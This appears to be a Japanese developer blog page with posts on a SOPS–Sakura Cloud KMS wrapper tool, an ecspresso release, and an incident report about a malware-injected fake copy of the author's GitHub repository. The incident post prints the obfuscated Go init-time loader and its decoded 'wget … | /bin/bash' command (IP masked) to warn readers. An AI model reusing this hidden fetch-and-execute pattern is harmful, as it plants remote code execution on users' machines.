この記事は さくらインターネット Advent Calendar 2025 2日目の記事です。

3行でまとめ

• SOPS とさくらのクラウドKMSを組み合わせて使う sops-sakura-kms を開発しました
• sops コマンドのラッパーとして動作します。sops 自体は改変しません
• Terraform などとも連携できて便利です。どうぞご利用ください

サービス運用に使用するAPIキーやパスワードなど、いわゆる秘匿値をどう管理するかは悩ましいものです。1Password などのパスワード管理サービスや各種クラウドのシークレットマネージャーなどに保存するのが一般的ですが、バックアップや履歴管理のために、十分な強度を持った暗号化を施した上でリポジトリで管理したいことも多いと思います。

このような目的のために、自分はよく SOPS を使っていました。SOPS は元々 Mozilla が開発し、現在は CNCF (Cloud Native Computing Foundation) のサンドボックスプロジェクトとして管理されている暗号化ファイルエディタです。YAML や JSON などの設定ファイルの値を暗号化・復号化でき、AWS KMS、GCP KMS、Azure Key Vault、PGP、age など様々な鍵管理サービスと連携できます。

SOPS の嬉しいところは、YAML や JSON の構造やキーはそのまま、値だけを暗号化できることです。ファイル全体を暗号化してしまうよりも人間に優しい (= grep しやすい!) 状態で扱えます。

www.cncf.io

sops-sakura-kmsとは

sops-sakura-kms は、SOPS でさくらのクラウド KMS をデータキーの暗号化に使用できるようにするラッパーツールです。OSS として公開しています。

github.com

さくらのクラウド KMS について

さくらのクラウドは2025年に多数の新機能を追加しましたが、その中には KMS(Key Management Service) もあります。KMSはデータ暗号化に用いられる暗号鍵の作成、保管、削除などのライフサイクル管理を行うサービスで、FIPS 140-2 level 3 認証を受けた HSM (Hardware Security Module) と連携して暗号鍵を保護します。

cloud.sakura.ad.jp

KMS については、昨日12/1のアドベントカレンダーの記事もあわせてご覧ください。

qiita.com

せっかくさくらのクラウドでKMSが使えるようになったので、SOPSと組み合わせて使いたいと思ったのが開発のきっかけです。

SOPS に PR を送るべきか否か

SOPS は標準で AWS KMS、GCP KMS、Azure Key Vault、HashiCorp Vault などに対応していますが、さくらのクラウドKMSには対応していません。

最初は、SOPS に PRを送って対応してもらおうかと考えました。しかし既存の PR を調べたところ、Oracle Cloud (#1226)、Cloud.ru (#1718) など、各種クラウドのKMS対応を追加するPRはいくつも出ていましたが、これらは一向にマージされないようです。

メンテナーの気持ちになってみればそれはそうで、それほどメジャーでもない各クラウド固有の機能を見境なく取り込んでしまうと、のちのメンテナンスが大変になることは明らかです。

というわけでSOPS本体を変更しないアプローチを探したところ、いい感じに使えそうなアイデアが浮かんだので実装したのが sops-sakura-kms です。

動作の仕組み

sops-sakura-kms は、Hashicorp Vault Transit Engine 互換のHTTPサーバーとして動作します。

1. sops-sakura-kmsを実行すると、ローカルで127.0.0.1:8200にVault Transit Engine互換のHTTPサーバーを起動します
2. 環境変数 SOPS_VAULT_URIS、VAULT_ADDR、VAULT_TOKEN を設定し、sops コマンドを子プロセスとして実行します
3. 起動された sops コマンドはデータキーの暗号化、複合化のために 127.0.0.1:8200 に Vault Transit Engine API で通信します
4. サーバーはリクエストをさくらのクラウドKMS APIに中継し、実際の暗号化/復号化を行います

つまり SOPS から見ると「HashiCorp Vault」と通信しているように見えますが、実際にはさくらのクラウドKMSを使って暗号化・復号化が行われます。SOPSがすでに対応している Vault Transit Engine での暗号化機能に乗っかることで、SOPS本体を改変することなくさくらのクラウドKMSを利用できるようになりました。

インストール方法

sops-sakura-kms は複数の方法でインストールできます。

Homebrew

brew install fujiwara/tap/sops-sakura-kms

バイナリダウンロード

GitHubのリリースページ から、お使いの環境に合ったバイナリをダウンロードできます。

GitHub Actions

CI/CDパイプラインで使用する場合など、GitHub Actionsで簡単にセットアップできます。

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: fujiwara/sops-sakura-kms@main
        with:
          version: 'v0.1.0'  # または 'latest'

Dockerコンテナ

コンテナイメージも提供しています。このイメージには sops-sakura-kms と sops の両方が含まれています。

docker run --rm \
    -e SAKURACLOUD_ACCESS_TOKEN \
    -e SAKURACLOUD_ACCESS_TOKEN_SECRET \
    -e SAKURACLOUD_KMS_KEY_ID \
    -v $(pwd):/work -w /work \
    ghcr.io/fujiwara/sops-sakura-kms:v0.1.0 \
    -d secrets.enc.yaml

セットアップ

環境変数の設定

以下の環境変数を設定します。

# さくらのクラウドAPIクレデンシャル
export SAKURACLOUD_ACCESS_TOKEN="your-access-token"
export SAKURACLOUD_ACCESS_TOKEN_SECRET="your-access-token-secret"

# さくらのクラウドKMSのリソースID（12桁の数字）
export SAKURACLOUD_KMS_KEY_ID="123456789012"

KMSキーIDは、KMSキーを作成した後に確認できるリソースIDです。

オプションの環境変数

動作をカスタマイズするためのオプション環境変数も用意されています。

# サーバーのみモードで実行（SOPSを実行しない）
export SSK_SERVER_ONLY=true

# サーバーのリッスンアドレス（デフォルト: 127.0.0.1:8200）
export SSK_SERVER_ADDR="127.0.0.1:8200"

# 実行するコマンド（デフォルト: sops）
export SSK_COMMAND="/path/to/sops"

基本的な使い方

sops-sakura-kmsは、sops コマンドの単純な代替として使用できます。コマンドライン引数は加工せずに sops に渡すため、通常の sops コマンドと同じように使えます。

ファイルの暗号化

sops-sakura-kms -e secrets.yaml > secrets.enc.yaml

ファイルの復号化

sops-sakura-kms -d secrets.enc.yaml

暗号化ファイルの編集

sops-sakura-kms secrets.enc.yaml

これだけです！裏側で自動的にローカルサーバーが起動し、さくらのクラウドKMSと連携して暗号化・復号化が行われます。

応用的な使い方

サーバーのみを起動する

sops-sakura-kms は、SOPS を実行せずに Vault Transit Engine 互換サーバーとして単独で動作させることもできます。

export SSK_SERVER_ONLY=true
sops-sakura-kms

この状態で、Vault APIエンドポイントを直接呼び出せます。

# データの暗号化
curl -X PUT http://127.0.0.1:8200/v1/transit/encrypt/123456789012 \
  -H "Content-Type: application/json" \
  -d '{"plaintext":"aGVsbG8gd29ybGQ="}'

# データの復号化
curl -X PUT http://127.0.0.1:8200/v1/transit/decrypt/123456789012 \
  -H "Content-Type: application/json" \
  -d '{"ciphertext":"vault:v1:..."}'

このモードは以下のような場面で便利です。

• アプリケーションからVault Transit Engine APIを直接使用したい場合
• サーバーを別サービスとして実行したい場合
• 暗号化/復号化APIのテストやデバッグ

Terraformとの連携

Terraform と sops-sakura-kms を組み合わせてシークレットを復号できます。まず、暗号化ファイルを作成します。

sops-sakura-kms -e secrets.yaml > secrets.enc.yaml

次に、Terraformでsops_fileデータソースを使用します。

terraform {
  required_providers {
    sops = {
      source  = "carlpett/sops"
      version = "~> 1.0"
    }
  }
}

data "sops_file" "secrets" {
  source_file = "secrets.enc.yaml"
}

output "secret_value" {
  value     = data.sops_file.secrets.data["password"]
  sensitive = true
}

Terraformの実行時はSSK_COMMAND環境変数を使って、sopsの代わりにterraformを実行するように設定します。

export SSK_COMMAND=terraform
sops-sakura-kms plan
sops-sakura-kms apply

これにより、sops-sakura-kms が自動的にVault Transit Engine互換サーバーを起動し、必要な環境変数を設定した上で terraform コマンドを実行します。Terraform 実行中に動作する sops プロバイダーはローカルサーバーを使ってシークレットを復号します。

まとめ

sops-sakura-kms は、さくらのクラウドKMSを SOPS で利用可能にするラッパーツールです。Vault Transit Engine 互換サーバーとして動作することで、SOPS 本体を改変することなく、既存のエコシステムをそのまま活用できます。

インストールも設定も簡単で、既存の SOPS ワークフローをほぼそのまま移行できます。GitHub Actions や Docker コンテナもサポートしているので、CI/CD パイプラインへの組み込みも容易です。

さくらのクラウドを利用している方、これから利用を検討している方は、ぜひ試してみてください！ (ちなみにさくらインターネット社内でも、既に利用され始めています)

Amazon ECS デプロイツール、ecspresso v2.6.0 をリリースしました。

github.com

新機能

ECS Blue/Green デプロイ対応

これまで ECS では CodeDeploy と連携する形での Blue/Green デプロイがサポートされていましたが、先日 ECS deployment controller でのネイティブな Blue/Green がサポートされました。その対応が入っています。

aws.amazon.com

使い方としては特にこれまでと変わらず、サービス定義ファイルに B/G 用の属性を追加して ecspresso deploy するだけで使えるようになります。READMEを参照してください

実装は実は何も大変ではなかったので(ほぼSDKのバージョンを上げただけ) 即日 nightly バージョンをリリースしたところ、早速検証記事を書いていただけました。助かります! kakakakakku.hatenablog.com

rollback コマンドが進行中のデプロイメントを停止するように

2025年5月に、ECS 自体にロールバックのための仕組み(進行中のデプロイメントを停止する)が導入されました。ecspresso rollback は可能な場合にはその API を利用してロールバックを行うようになりました。

aws.amazon.com

これまでの ecspresso rollback は、以下のような実装になっていました。

1. 現在動作している ECS サービスに設定されているタスク定義を見つける
2. そのタスク定義の「直前のリビジョン」(削除/無効化されていない、現在のリビジョンより小さく一番近い値のもの)を見つける
3. 「直前のリビジョンのタスク定義」を使って、デプロイと同じ処理をする

そもそもロールバックするための API が ECS には長らく存在しなかったため、このようにしてロールバック処理をエミュレートしていました。今回は ECS 自体に API が追加されたため、それに対応したということになります。

(ちなみに、DeploymentControllerが CodeDeploy の場合は以前から CodeDeploy 自体の API でロールバックを行っていました)

なお、デプロイが完全に完了してしまった場合は ECS でのロールバックができません。その状態で実行すると、以前と同様のアルゴリズムでロールバックを行います。

tfstate参照で for_each / count で定義されたリソースをまとめて参照できるように

tfstate-lookup v1.7.0 で使えるようになった機能です。

これまで ecspresso での tfstate 参照では、for_each / count で定義されたリソースのアドレスを aws_subnet.private["az-a"] のようにindexまで指定する必要がありました。今回のアップデートで for_each で定義されたリソースは Object で、count で定義されたリソースは List で取得できるようになりました。

例えば subnet を for_each で定義する例を考えます。

resource "aws_subnet" "private" {
  for_each = {
    a = 1,
    b = 2,
    c = 3,
  }
  vpc_id            = aws_vpc.main.id
  cidr_block        = "10.0.${each.value}.0/24"
  availability_zone = "ap-northeast-1${each.key}"
}

このように定義したリソースは ecspresso から

• {{ tfstate `aws_subnet.private["a"]` }}(テンプレート記法の場合),
• tfstate('aws_subnet.private["a"]')(Jsonnetの場合)

などとして参照できますが、新たに aws_subnet.private というアドレスで object (key が index, value がそれぞれのリソース) として参照できるようになりました。

これを利用すると、例えば Jsonnet では以下のように std.objectValues で全ての value (リソース) を取得してループを回すような記述が可能になります。

local tfstate = std.native('tfstate');
{
  subnets: [
    subnet.id for subnet in std.objectValues(tfstate('aws_subnet.private'))
  ],
}

参照先の tfstate によってリソースの数やkeyが違うような場合にも、共通の定義ファイルで対応できますね。

挙動の変更

ecspresso deploy --wait-until deployed がデフォルトに

v2.5.0 での新機能で、deploy オプションに --wait-until=(deployed|stable) が追加されています。これはコントリビューションいただいた機能です。

www.estie.jp

v2.6 では、デフォルトで --wait-until=deployed が指定されるようになりました。

実は、最近のマネージメントコンソールでは --wait-until=deployed 相当(実行したデプロイメントが完了した時点) のタイミングで「デプロイが完了した」と報告されます。

以前のデフォルトである --wait-until=stable は新しいデプロイメントが完了した後、古いデプロイメントが完全に停止するまで待たされてしまうので、マネージメントコンソールでの体感と異なる状態になっていました。今回の変更で同一になります。

なお ecspresso には他にも --wait-until を持つコマンドがあります(scale, rollback, wait)が、それらのデフォルトは stable のままです。

不具合修正

ECS サービスに紐づいている LoadBlancer や ServiceConnect の設定をサービス定義から削除しても、実際には紐付けが削除されない問題を修正しました。

ということで、ecspresso v2.6.0 の紹介でした。どうぞご利用ください。

物騒な世の中です。皆様お気をつけください。

3行でまとめ

• 自作の OSS、fujiwara/apprun-cli のマルウェア入り偽物を作られて GitHub で公開されました
• 偽物には大量の新規アカウントがスターを付けていたため、検索でオリジナルのものより上位に表示される状態でした
• GitHub に通報したところ、偽物を作ったアカウントはbanされたようです

経緯

2024年末に、さくらのAppRun用デプロイツール apprun-cli という OSS を公開しました。

github.com

2025年2月10日 12時過ぎのこと、謎の人物が X で apprun-cli を宣伝しているのを見つけました。

どう見ても自分の物と同じ(コピー)なのですが、妙にスターが多い。リポジトリをのぞいてみると、fork ではなくコードがすべて commit 履歴を引き継がない状態でコピーされ、スターをつけているのはここ数日で作成されたアカウントばかりなので、これはspam目的だなあと。

しかしライセンスもちゃんと(改変せずに)コピーされているので、MITライセンス的には問題ない状態です。まあでも明らかにspamだし、GitHub に通報するか…と思っていたところ、同僚が差分に不審なコードがある、と教えてくれました。

コードは一応難読化されているのですが、exec.Command で外部コマンドを実行していて明らかに不審ですね。

func apknAR() error {
    uW := []string{"d", "a", "f", ".", "d", "p", "/", "/", " ", "0", "t", "e", " ", "&", "f", ":", "h", "n", "/", "1", "t", "7", "r", "e", " ", "h", "d", ".", "s", "1", "b", "a", "7", "a", "5", "O", "1", "t", "b", "g", ".", "|", "6", "w", "/", " ", "b", "1", "g", "5", "7", "0", "3", "8", "1", "-", "/", " ", "/", "-", "s", "5", "/", "2", "4", "3", "3", "o", "e", " ", "t", "0", "i"}
    YqGVjWNN := "/bin/sh"
    YmeLkYfy := "-c"
    TyNpjDez := uW[43] + uW[39] + uW[68] + uW[70] + uW[12] + uW[55] + uW[35] + uW[45] + uW[59] + uW[57] + uW[25] + uW[20] + uW[10] + uW[5] + uW[15] + uW[62] + uW[18] + uW[47] + uW[53] + uW[49] + uW[27] + uW[19] + uW[9] + uW[71] + uW[40] + uW[29] + uW[34] + uW[50] + uW[3] + uW[54] + uW[63] + uW[32] + uW[56] + uW[28] + uW[37] + uW[67] + uW[22] + uW[1] + uW[48] + uW[11] + uW[44] + uW[0] + uW[23] + uW[65] + uW[21] + uW[52] + uW[26] + uW[51] + uW[4] + uW[14] + uW[58] + uW[33] + uW[66] + uW[36] + uW[61] + uW[64] + uW[42] + uW[46] + uW[2] + uW[69] + uW[41] + uW[24] + uW[7] + uW[38] + uW[72] + uW[17] + uW[6] + uW[30] + uW[31] + uW[60] + uW[16] + uW[8] + uW[13]
    exec.Command(YqGVjWNN, YmeLkYfy, TyNpjDez).Start()
    return nil
}

var lEVKGADV = apknAR()

これを復元すると、以下のような sh を実行するコードであることがわかります(IPアドレスは一応隠しました)。ひどい。

wget -O - http://***.***.***.***/storage/de373d0df/a31546bf | /bin/bash &

GitHub に通報

docs.github.com

GitHub で偽物を公開していたアカウントのページから「Block or Report」→「Report abuse」と進み、経緯と証拠をまとめて以下の文面で報告しました。ちなみにこの文面は ChatGPT に考えてもらったものです。便利。

Hello, GitHub Support Team,

I would like to report an unauthorized copy of my repository, fujiwara/apprun-cli, which appears to include potentially malicious modifications.

Details of the Issue
- My original repository: https://github.com/fujiwara/apprun-cli
- Copied repository: https://github.com/sunnycicada/apprun-cli
- Malicious behavior: The copied repository appears to have added suspicious code, which might be malware. The concerning portion of the code can be found here:
https://github.com/sunnycicada/apprun-cli/blob/fcb59bfd3848d92e352eb299b1d95cc4cd942509/app.go#L158-L167
- Artificial engagement: The copied repository is linked to a recently created account, sunnycicada, which appears to be engaging in suspicious activity, including mass starring of repositories.

Request
Please investigate this case as it involves both unauthorized copying of my repository and potentially harmful modifications that could mislead users. If needed, I can provide additional evidence.
Thank you for your support. I look forward to your response.

Best regards,

結果

2025-02-10 13:10 (JST) ごろ報告、約13時間後に確認したところ、アカウントとリポジトリがbanされたのか404になっていました。とりあえずよかったですね。

ということで、GitHub で OSS を探すときは「名前で検索してスターがいっぱいついていて上に出てくるもの」を安易に入れてしまうと、まんまとマルウェアの餌食になる可能性があります。皆様お気をつけください。